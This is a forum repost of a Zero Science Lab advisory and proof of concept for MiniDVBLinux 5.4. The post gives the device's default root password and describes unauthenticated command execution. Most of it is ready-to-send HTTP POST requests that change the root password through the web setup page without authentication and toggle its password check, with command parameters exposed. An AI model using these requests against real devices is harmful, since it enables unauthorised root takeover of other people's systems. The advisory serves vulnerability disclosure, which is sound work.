Стани премиум член и добиј попуст на 2000+ производи и куп други бенефити!
  • Важно
    Имате проблем со најава или регистрација на it.mk?
    Побарајте го решението на вашиот проблем ТУКА!

MiniDVBLinux 5.4 Change Root Password PoC

zeroscience

ZSL Bot v4.89.1.00
31 мај 2010
920
559
www.zeroscience.mk
Код:
MiniDVBLinux 5.4 Change Root Password PoC


Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.

Desc: The application allows a remote attacker to change the root
password of the system without authentication (disabled by default)
and verification of previously assigned credential. Command execution
also possible using several POST parameters.

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux 4.19.127.203 (armv7l)
           VideoDiskRecorder 2.4.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5715
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php


24.09.2022

--


Default root password: mld500

Change system password:
-----------------------

POST /?site=setup&section=System HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 778
Content-Type: application/x-www-form-urlencoded
Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba
Host: ip:8008
Origin: http://ip:8008
Referer: http://ip:8008/?site=setup&section=System
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
sec-gpc: 1

APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+


Pretty post data:

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD: r00t
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Kumanovo
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: SYSTEM_PASSWORD


Eenable webif password check:
-----------------------------

POST /?site=setup&section=System HTTP/1.1

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
WEBIF_PASSWORD_CHECK: 1
action: save
params:
changed: WEBIF_PASSWORD_CHECK


Disable webif password check:
-----------------------------

POST /?site=setup&section=System HTTP/1.1

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: WEBIF_PASSWORD_CHECK


 

Нови мислења

Последни Теми

Статистика

Теми
46.845
Мислења
970.023
Членови
35.202
Огласи
2.830
Најнов член
TrubacoT
На врв Дно